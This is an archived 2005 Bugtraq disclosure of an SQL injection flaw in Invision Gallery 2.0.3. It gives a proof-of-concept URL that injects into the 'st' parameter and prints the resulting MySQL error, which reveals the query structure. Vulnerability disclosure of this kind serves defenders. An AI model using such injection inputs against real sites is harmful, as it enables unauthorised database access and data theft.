SQL In Invision Gallery 2.0.3

almaster_at_hotmail.com
Date: 10/30/05

Next message: Georg Wicherski: "mwcollect v3.0.0 Release"

Previous message: Sune Kloppenborg Jeppesen: "[ GLSA 200510-25 ] Ethereal: Multiple vulnerabilities in protocol dissectors"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 30 Oct 2005 15:15:52 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is) Credit: By aLMaSTeR HaCKeR [ almaster@hotmail.com]

Vulnerable: Invision Gallery 2.0.3

EXPLIOT:

http://www.site.com/index.php?automodule=gallery&cmd=sc&cat=26&sort_key=date&order_key=DESC&prune_key=30&st=|aLMaSTeR

The Error:

mySQL query error: SELECT i.*, m.members_display_name AS name, m.id AS mid, r.id as rated
                FROM ibf_gallery_images i
                    LEFT JOIN ibf_members m ON ( m.id=i.member_id )
                    LEFT JOIN ibf_gallery_ratings r ON ( r.img_id=i.id AND r.member_id=0 )
                WHERE category_id=26 AND i.approved=1
                    GROUP BY i.id
                ORDER BY pinned DESC, date DESC , i.id DESC LIMIT ', 20

SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 20' at line 7
SQL error code:
Date: Sunday 30th of October 2005 04:53:19 PM

Thanks TO MY FRIENDS IN S4A.CC

almaster@s4a.cc or almaster@hotmail.com

Next message: Georg Wicherski: "mwcollect v3.0.0 Release"

Previous message: Sune Kloppenborg Jeppesen: "[ GLSA 200510-25 ] Ethereal: Multiple vulnerabilities in protocol dissectors"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]